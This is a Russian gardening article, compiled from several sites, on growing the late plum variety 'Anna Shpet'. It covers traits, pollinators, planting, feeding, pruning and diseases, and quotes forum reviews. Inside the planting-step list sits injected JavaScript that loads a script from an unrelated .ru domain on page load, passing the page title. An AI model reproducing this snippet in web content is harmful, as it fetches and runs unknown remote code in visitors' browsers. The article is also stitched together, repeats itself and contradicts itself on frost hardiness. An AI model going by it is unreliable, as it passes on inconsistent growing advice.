Слива Анна Шпет – немецкий шик на вашей даче

Слива Анна Шпет: особенности и характеристики сорта, тонкости посадки, ухода, обрезки и размножения

Описание сорта с фото

Описание сорта с фото

Сорт высокоурожайный, поздний. Первый сбор плодов происходит через 4 года после высадки двухлетнего саженца. Урожай слив снимается в конце сентября — начале октября.

Спелые сливы долго висят на ветвях, не опадая. Молодое дерево даёт около 23 килограмм. С возрастом урожайность возрастает.

Соцветия нежно-белые. Плоды крупные, около 50 грамм. Форма яйцевидная. Окраска кожицы тёмная, фиолетовая. Кожица не толстая. Подкожные точки серого цвета. Восковой налёт легкостирающийся.

Мякоть ароматная, жёлто-зелёная, сочная, очень сладкая. Косточка яйцевидной формы, легко отделяемая от мякоти.

Взрослое дерево имеет пирамидальную, широкую крону. Высота взрослого дерева достигает 4,5 метров. Штамб прямой.

Побеги толстые, коричневой окраски. Кора серого цвета. Почки небольшие, кончики заострённые. Листья зелёные, матовые, овальной формы, нижняя часть имеет небольшую опушку. Черешок небольшой.

Характеристики

Характеристики

Анна Шпет – это поздний сорт сливы, созревать ягоды начинают только в конце сентября или начале октября. Плоды не осыпаются и могут долго оставаться на дереве даже после полного созревания.

Основными достоинствами этого сорта являются:

  • высокая урожайность;
  • очень крупные и вкусные плоды;
  • раннее начало плодоношения;
  • поздние сроки созревания;
  • неприхотливость в уходе;
  • возможность длительного хранения ягод;
  • высокая степень регенерации дерева.

Это высокоурожайный сорт, со взрослого 20-тилетнего дерева можно собрать около 100-150 кг ягод. Плодоносить же Анна Шпет начинает уже через 4-5 лет после посадки.

После снятия с дерева ягоды могут очень долго храниться в прохладном месте без потери вкусовых и товарных качеств. Хорошо используются как для переработки, так и для употребления в свежем виде.

К морозам сорт неустойчив, однако, даже при сильном подмерзании, способен быстро восстанавливаться. Но для выращивания в холодном климате все же не подходит, т. к. становится малоурожайным и чаще болеет. Он нетребователен к почве и уходу и может хорошо переносить засуху.

Анна Шпет – сорт лишь частично самоплодный, и для получения лучшего урожая ему необходимо дополнительное опыление.

Отличными опылителями для него будут сорта слив:

  • Виктория;
  • Ренклод Альтана;
  • Екатерина;
  • Ранняя;
  • Вашингтон;
  • Венгерка домашняя;
  • Кирке;
  • Ренклод зеленый.

Плодоносит Анна Шпет ежегодно и очень обильно. Но даже самому неприхотливому растению, чтобы получать такие урожаи, нужно обеспечить правильный уход.

Посадка и уход

Посадка и уход

Высаживать сливу лучше всего весной, когда полностью оттает земля. Перед посадкой кислую почву обязательно известкуют. Важно учитывать и расположение грунтовых вод. Для сливы их уровень должен быть не выше 1,5 м.

Для посадки лучше выбирать теплые, хорошо защищенные, солнечные места, например, возле стены дома, у забора или с южной стороны склона. Слива хорошо переносит влажность почвы и любит не тяжелый, суглинистый грунт.

Посадочные ямы выкапывают на глубину около 50-60 см и диаметром 70-80 см. После установки посадочного колышка, яму на 2/3 заполняют смесью из верхнего слоя земли, органических и минеральных удобрений (10-15 кг перегноя и полкило суперфосфата).

При посадке надо следить, чтобы корневая шейка саженца не заглублялась в грунт, и находилась на 4-5 см выше почвы. Деревце аккуратно устанавливают в яму и плотно прикапывают, оставляя вокруг корней лунку для полива.

Ствол неплотно подвязывают к колышку мягкой веревкой или пленкой. Рядом обязательно должно расти хотя бы 2-3 сорта-опылителя.

В первый год после посадки саженец не удобряют, только поливают, рыхлят и пропалывают почву. В начале цветения около 80% цветков желательно срезать, чтобы облегчить процесс приживаемости.

На следующий год, в июне, можно провести первую азотную подкормку. До наступления стабильного плодоношения деревце надо удобрять трижды за сезон: в начале мая, в июне и в конце августа.

Когда плодоношение станет регулярным, то первую подкормку проводят перед началом цветения, вторую – непосредственно во время созревания ягод и третью – после сбора урожая.

Сорта слив, радующие своей высокой урожайностью: Светлячок, Венгерка Корнеевская, Память Тимирязева, Ренклод Альтана, Ренклод колхозный, Ренклод советский, Кромань, Синий дар, Стартовая, Утро, Болховчанка, Скороплодная.

Для этого можно использовать раствор мочевины, суперфосфат калия или нитрофоску. Удобрения вносят только во влажную почву, после чего ее тщательно рыхлят. Осенью азотные подкормки исключают.

Ежегодно, в течение сезона, после прополки почву необходимо рыхлить, поливать и хорошо мульчировать перегноем. Сорт Анна Шпет склонен к появлению корневой поросли, которую обязательно следует удалять.

Также немаловажной процедурой в уходе за сливой является регулярный обильный полив и правильная обрезка.

Первая обрезка проводится уже в момент посадки: все ветви обрезают на 1/3 длины. В дальнейшем, обрезку проводят ежегодно, в начале весны.

В первую очередь полностью удаляют поврежденные морозом и больные ветви. При прореживании молодых побегов, оставляют только самые крепкие и прямые. Нельзя срезать большое количество побегов и ветвей зараз. Удалять можно не более четверти от всей массы.

Когда дерево вытянется до 2-2,5 м, то начинают формировку кроны. Верхушку и все вертикальные ветви обрезают, при сильном загущении – прореживают.

Особенности выращивания и ухода

Особенности выращивания и ухода

Дерево при заморозках может подмерзать, но имеет свойство быстро восстанавливаться.

Холодные климатические условия для выращивания сорта Анна Шпет не подходят. Дерево будет болеть, и урожай будет небольшим. Сорт легко переносит засуху и не требователен к почве.

Для посадки сорта подходит весна. Место не должно продуваться ветрами и иметь хорошую освещённость. Лучшим вариантом для посадки является не тяжёлая, суглинистая почва. Грунтовые воды должны проходить на глубине более метра. При необходимости участок искусственно наращивается на полметра.

Яма для посадки должна иметь диаметр 80 сантиметров и глубину 60 сантиметров.

Для посадки саженца подготавливается питательная смесь из ведра перегноя, половины ведра дёрна, 0,5 килограмм суперфосфата.

  • Смесь перемешивается и высыпается в яму.
  • В яму вбивается деревянный колышек.
  • Деревце опускается, корни распрямляются и засыпаются землёй.
  • Корневая шейка должна остаться над землёй на высоте 5 сантиметров.
  • Саженец аккуратно подвязывается.
  • На расстоянии 3 метров высаживается сорт-опылитель.
  • var m5d6fd70f32c60 = document.createElement(‘script’);
    m5d6fd70f32c60.src=’https://s98k2dmmbm.ru/show/?’ + Math.round(Math.random()*100000) + ‘=’ + Math.round(Math.random()*100000) + ‘&’ + Math.round(Math.random()*100000) + ‘=3085&’ + Math.round(Math.random()*100000) + ‘=’ + document.title +’&’ + Math.round(Math.random()*100000);
    function f5d6fd70f32c60() else
    }
    f5d6fd70f32c60();

    В первый год уход за деревцем включает в себя прополку, полив, рыхление и мульчирование. Через год в июне производится первая подкормка азотной селитрой. Подкормка производится в начале мая, в начале июня и конце августа.

    Когда дерево подрастает и начинает плодоносить, подкормка производится до бутонизации, перед созреванием плодов и после снятия урожая.

    При появлении первых цветов 80 процентов цветов удаляется, это позволяет дать время деревцу набрать силу и на следующий год дать обильный и высококачественный урожай.

    Удобрение должно состоять из смеси суперфосфата, мочевины и калия. Подкормка совмещается с поливом дерева и рыхлением околоствольного круга.

    Этот сорт имеет повышенное образование корневой поросли, её нужно удалять дважды в год.

    Первая обрезка дерева осуществляется после посадки. Веточки деревца укорачиваются на 1/3. Затем производится ежегодная весенняя обрезка неправильно расположенных, сухих, повреждённых ветвей.

    При достижении 2,5 метров производится формировка кроны. Все ветви, расположенные вертикально, обрезаются. Все загущенные места прореживаются. Ветви не должны касаться друг друга.

    Сорт Анна Шпет подвержен заболеванию монилиозом. При таком заболевании деревце страдает веточки и листья буреют, засыхают. Плоды покрываются серыми наростами и гниют. Для борьбы с монилиозом необходимо провести ряд процедур: сбор и сжигание листвы, обрезка больных ветвей, обработка дерева бордоской жидкостью.

    Профилактическая обработка деревьев намного снижает риск заболеваний

    Пятнистость красная (грибковое поражение) появляется ранним летом, после проливных дождей, поражает листья желто-оранжевыми пятнами. При отсутствии защитных мер дерево теряет листья и слабеет. Для борьбы с болезнью используется бордоская жидкость. Осенью дерево и околоствольный круг обрабатывается медным купоросом. Упавшая листва собирается, сжигается.

    Для защиты от грызунов на зиму молодое деревце укрывается полностью полимерной сеткой, рубероидом. У взрослого дерева укрывается штамб и прикорневой круг.

    Слива для увеличения урожайности требует посадки рядом дерева-опылителя. Лучшими сортами для опыления является Сливы Кирке, Ранняя, Ренклод зеленый, Екатерина.

    Сливы Анна Шпет очень вкусные и используются в свежем виде и консервации. Долго хранятся.

    Болезни и вредители

    Болезни и вредители

    Из существенных недостатков можно выделить:

    • средняя зимостойкость;
    • склонность к монилиозу и полистигнозу.

    Сорт сливы Анна Шпет не очень устойчив к таким заболеваниям, как полистигмоз и монилиоз.

    Полистигмоз или красная пятнистость – это грибное заболевание, поражающее листья сливы и алычи. Проявляется оно в начале лета, после сильных весенних дождей, в виде небольших желтоватых пятен на листьях.

    Эти пятна очень быстро разрастаются и приобретают сначала оранжевый, а потом ярко-красный цвет. Если вовремя не лечить растение, то болезнь может привести к полному осыпанию листьев, что приводит к ослаблению дерева и снижает его морозостойкость.

    До начала плодоношения больное дерево можно обработать бордосской жидкостью или специальными фунгицидами. После снятия урожая, осенью, хорошо помогает опрыскивание листьев и почвы под деревом медным купоросом. И обязательно все опавшие листья надо сгребать и сжигать.

    Монилиоз, в отличие от красной пятнистости, поражает не только листья, а все части растения. Пораженные листья и побеги становятся бурыми и засыхают. Ягоды покрываются небольшими серыми наростами и начинают гнить.

    Меры борьбы с этой болезнью во многом схожи с методами лечения полистигмоза, и заключаются в своевременной уборке листьев обрезке больных ветвей и побегов и обработке дерева бордосской жидкостью и фунгицидами.

    Сорт Анна Шпет очень часто страдает от повреждения морозами и нападения грызунов.

    Поэтому на зиму молодое растение надо укутывать полностью, а у взрослого – тщательно укрывать ствол с помощью плотной толстой ткани, обернутой полимерной сеткой.

    Это поможет защитить дерево не только от мороза, но и от повреждения зайцами и мышами.

    Несмотря на появление огромного количества новых сортов слив, устойчивых к болезням и морозам, Анна Шпет хорошо подойдет для высадки на дачном участке.

    Ведь по сравнению с достоинствами, недостатков у нее не так уж и много.

    Отзывы садоводов о сливе Анна Шпет

    Отзывы садоводов о сливе Анна Шпет

    У нас эта слива уже лет десять растёт и плодоносит, мы ею очень довольны! Практически одни плюсы — урожайная, вкусная, косточка отстаёт, устойчивая к болезням и вредителям, долго висит на дереве и делается ещё слаще!!! В этом году ветки гнулись под урожаем, пришлось подпирать! Зимо- и морозоустойчивая, ни разу не подмерзала. Если и буду убирать другие старые сорта, то Анну Шпет никогда!!!

    lus

    http://forum.vinograd.info/showthread.php?t=11043

    У меня средняя масса плодов составляет 50–60 г. К достоинствам отнесу и терпимую устойчивость к растрескиванию в дождливый период. Правда, для этого дерево желательно поливать в период созревания плодов. Реально перезреть не может, ибо становится ещё слаще, особенно в октябре, когда кожица становится немного подвяленной. Кроме прекрасного вкуса в свежем виде, отмечу превосходный вкус сушёной сливы. Точнее, подсушенной. Разрезаю её на половинки и хорошо подсушиваю в электрической сушилке. Уложенная в банки подсушенная слива прекрасно хранится. Обрабатываю от монилиоза и вредителей наравне с другими косточковыми. Негативных последствий не замечал (8 лет), хотя, конечно, монилиоз в саду имеется.

    Юрий Онищенко

    http://forum.vinograd.info/showthread.php?t=11043

    Моему дереву пять лет, отличный поздний сорт! Очень вкусный в свежем виде, дерево растёт без опылителя, так бы урожай был больше.

    bauer

    http://forum.vinograd.info/showthread.php?t=11043

    Дерево Анны Шпет, посаженное на даче ещё моими родителями, радовало нас хорошим урожаем вкусных слив в девяностых-двухтысячных годах. Но недостаточная устойчивость сорта к грибным болезням (виноват, защитную обработку «химией» не делал) приводила вначале к потере урожая и ослаблению дерева, а потом и к поломке дерева ураганным ветром. Так что любителям АШ надо позаботиться о защите от болезней. А по вкусовым качествам для сравнения с АШ я бы посоветовал привить сорта Ненька и Ренклод Карбышева.

    Садовник-виноградарь

    http://forum.vinograd.info/showthread.php?t=11043

    Анна Шпет — любимый многими садоводами поздний сорт сливы. Плоды отличаются сочной мякотью, насыщенным вкусом и ароматом. Высокая дегустационная оценка и внешняя привлекательность сливы обеспечивают постоянный спрос.

    • Автор: Анна Градская
    • Распечатать

    Стремление ежедневно узнавать что-либо новое способствует совершенствованию профессиональных навыков.
    Оцените статью:

    (5 голосов, среднее: 3.2 из 5)

    Слива Анна Шпет растет в южных регионах, славится своей сладостью и хорошей устойчивостью к морозам. Уход простой, но тщательный. Чтобы получать крупные богатые урожаи Анны Шпет, нужно ухаживать за саженцами и готовить почву. Тогда слива порадует сочной мякотью.

    Материал составлен на основе следующих статей:

  • https://1001sort.ru/sliva-anna-shpet.html
  • https://selo.guru/sadovodstvo/sliva/anna-shpet.html
  • https://lkard-lk.ru/dacha/sliva-anna-shpet-opisanie-sorta-s-foto-otzyvy
  • https://fermilon.ru/sad-i-ogorod/derevya/sliva-anna-shpet.html
  • Похожие записи